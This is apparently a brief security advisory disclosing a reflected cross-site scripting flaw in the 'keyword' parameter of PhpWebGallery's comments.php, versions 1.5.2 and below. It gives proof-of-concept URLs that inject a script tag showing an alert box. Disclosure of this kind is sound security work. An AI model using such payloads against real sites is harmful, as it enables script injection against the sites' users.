PhpWebGallery versions 1.5.2 and below suffer from a cross site scripting flaw.
d52f4fc578e134dc6b7435377da1ad1bf1a973e97fb6534da00f1c14d184babe
Produce : PhpWebGallery <= 1.5.2
Site : http://www.phpwebgallery.net
Problem : XSS
Greetz : hasnaa and all friends
Moroccan Security Research Team
Vulnerable file : comments.php
Exploit :
http://localhost/phpwebgallery/comments.php?keyword=%22%3E[XSS]
http://localhost/phpwebgallery/comments.php?keyword=%22%3E%3Cscript%3Ealert('Hi+Master');%3C/script%3E
Contact : iss4m.h@gmail.com